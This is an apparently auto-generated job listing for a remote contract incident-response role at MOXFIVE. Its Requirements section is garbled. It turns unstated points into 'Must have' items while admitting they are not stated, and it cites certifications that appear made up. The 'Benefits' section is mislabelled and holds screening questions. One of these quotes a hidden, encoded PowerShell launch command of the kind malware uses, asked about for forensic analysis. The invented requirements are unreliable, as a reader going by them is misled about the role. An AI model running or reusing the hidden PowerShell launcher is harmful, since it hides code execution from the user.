
moxfive - International Contract Bench, Incident Response (DFIR)

Remote - International · $160k - $203k · 2mo ago
Remote · Staff · WW · Cloud Computing · Software · Contract Attorney · Linux · AWS · GCP · Azure


Requirements

• Experience responding to threat activity as an IR consultant or SOC analyst. No specific years of experience stated; however, the posting implies a need for at least some professional level experience in incident response and security analysis. It is reasonable to infer that MOXFIVE would require candidates with substantial practical knowledge due to their role on live support work which involves real cases.
• Strong understanding of Windows/Mac/Linux fundamentals, forensic artifacts, BEC (Business Email Compromise) analysis, and network analysis. No specific years or education level stated; however, the posting implies a need for knowledge in these areas as they are listed among what you'll bring to the role.
• Existing knowledge of cloud computing environments such as Azure, GCP, AWS is mentioned but no required experience levels specified beyond "expanding your knowledge." This suggests that while not mandatory at this stage, some familiarity with or willingness to learn about these platforms would be beneficial for a candidate considering the growing frontier in threat investigation.
• Must have certifications relevant to incident response and digital forensics (e.g., Certified Incident Handler [CIH], GIAC Certified Forensic Examiner Analyst [CFEA]). No specific certificates mentioned, but this is a common requirement within the industry that would likely be expected by MOXFIVE based on their focus and description of work they do.
• Must have skills in using forensic scripts to analyze suspicious activity (implied from "You’ve got a “Tools” folder sitting on your workstation somewhere with your favorite forensic scripts at the ready"). No specific years or education level stated, but proficiency and experience are implied.
• Must have skills in identifying legitimate users versus threat actor activities based on their keen sense of observation (implied from "You’ve honed a keen sense..."). Again no explicit requirement for this skill set is mentioned; however, it's an essential part of the role as described and would likely be expected.
• Must have skills in handling live response work at client sites or environments without committing all waking hours (implied from "You’d love to get your fix on some live response data..."). No specific years experience stated, but it's implied that candidates should already possess this skill set as they are described as weekend warriors and late-night crusaders.
• Must have skills in investigating the latest threats across various platforms (Azure, GCP, AWS) including account takeovers which is considered new malware after all (implied from "you’ve been starting to expand your knowledge on cloud-native forensics"). No specific years or education level stated.
• Must have skills in threat intelligence and an investigative mindset as the role involves solving real

Responsibilities

• Responding to threat activity as an IR consultant or SOC analyst.
• Strong understanding of Windows/Mac/Linux fundamentals and forensic artifacts.
• BEC analysis skills.
• Network analysis capabilities.
• Experience with cloud-native environments, including Azure, GCP, AWS, SaaS Apps.
• Ability to differentiate between legitimate users and threat actor activity based on experience of seeing them in action hundreds of times.
• Curiosity about new threats and a desire to solve real cases at an intensity compatible with personal life.

Benefits

• What’s your favorite forensic artifact and why?
• You find the following malicious PowerShell command during your investigation. What does it do? %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand 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
• On a scale from “white and fluffy” to CloudTrail Creator, how would you rate your cloud-native forensics skills across AWS, GCP, and Azure Cloud?
• What’s your availability look like on an average week to take on live response analysis work?
